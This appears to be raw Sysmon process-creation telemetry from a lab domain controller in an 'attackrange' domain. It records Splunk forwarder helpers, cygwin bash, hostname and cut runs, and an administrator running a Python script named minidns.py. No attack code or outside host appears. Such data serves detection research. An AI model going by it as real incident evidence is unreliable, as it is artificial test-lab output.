154100x800000000000000063135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.053{A8622C2F-569B-6078-5E0D-00000000AE01}7120C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exehostname -I C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-569B-6078-5D0D-00000000AE01}6452C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.047{A8622C2F-569B-6078-5D0D-00000000AE01}6452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-569B-6078-5C0D-00000000AE01}7016C:\Python27\python.exepython.exe c:\Temp\minidns.py 154100x800000000000000063119Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:07.001{A8622C2F-569B-6078-5C0D-00000000AE01}7016C:\Python27\python.exe-----python.exe c:\Temp\minidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 
154100x800000000000000063037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:03.078{A8622C2F-5697-6078-5A0D-00000000AE01}4196C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000062939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.655{A8622C2F-567E-6078-590D-00000000AE01}5116C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-567E-6078-570D-00000000AE01}3740C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062920Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.647{A8622C2F-567E-6078-580D-00000000AE01}5224C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-567E-6078-560D-00000000AE01}5008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 
154100x800000000000000062913Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.646{A8622C2F-567E-6078-570D-00000000AE01}3740C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:38.637{A8622C2F-567E-6078-560D-00000000AE01}5008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.468{A8622C2F-5677-6078-550D-00000000AE01}5456C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5677-6078-530D-00000000AE01}7120C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:06:31.459{A8622C2F-5677-6078-540D-00000000AE01}6824C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5677-6078-520D-00000000AE01}7060C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.458{A8622C2F-5677-6078-530D-00000000AE01}7120C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062824Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:31.449{A8622C2F-5677-6078-520D-00000000AE01}7060C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062790Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:22.739{A8622C2F-566E-6078-510D-00000000AE01}1552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:20.569{A8622C2F-566C-6078-500D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:19.958{A8622C2F-566B-6078-4F0D-00000000AE01}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062750Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:06:19.306{A8622C2F-566B-6078-4E0D-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062739Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:17.570{A8622C2F-5669-6078-4D0D-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:16.888{A8622C2F-5668-6078-4C0D-00000000AE01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:16.268{A8622C2F-5668-6078-4B0D-00000000AE01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:14.651{A8622C2F-5666-6078-4A0D-00000000AE01}5840C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5666-6078-490D-00000000AE01}5340C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:06:14.641{A8622C2F-5666-6078-490D-00000000AE01}5340C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062656Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:09.878{A8622C2F-5661-6078-480D-00000000AE01}5632C:\cygwin64\bin\cut.exe-----"C:\cygwin64\bin\cut.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5661-6078-470D-00000000AE01}5320C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:06:09.867{A8622C2F-5661-6078-470D-00000000AE01}5320C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062611Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:06:07.993{A8622C2F-565F-6078-460D-00000000AE01}6268C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:42.076{A8622C2F-5646-6078-450D-00000000AE01}6968C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5646-6078-440D-00000000AE01}6656C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:42.066{A8622C2F-5646-6078-440D-00000000AE01}6656C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000062383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:22.732{A8622C2F-5632-6078-430D-00000000AE01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:20.562{A8622C2F-5630-6078-420D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:19.872{A8622C2F-562F-6078-410D-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062346Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:05:19.288{A8622C2F-562F-6078-400D-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:17.501{A8622C2F-562D-6078-3F0D-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:16.881{A8622C2F-562C-6078-3E0D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:05:16.261{A8622C2F-562C-6078-3D0D-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:22.731{A8622C2F-55F6-6078-3C0D-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000062093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:20.592{A8622C2F-55F4-6078-3B0D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:19.962{A8622C2F-55F3-6078-3A0D-00000000AE01}4596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:19.280{A8622C2F-55F3-6078-390D-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
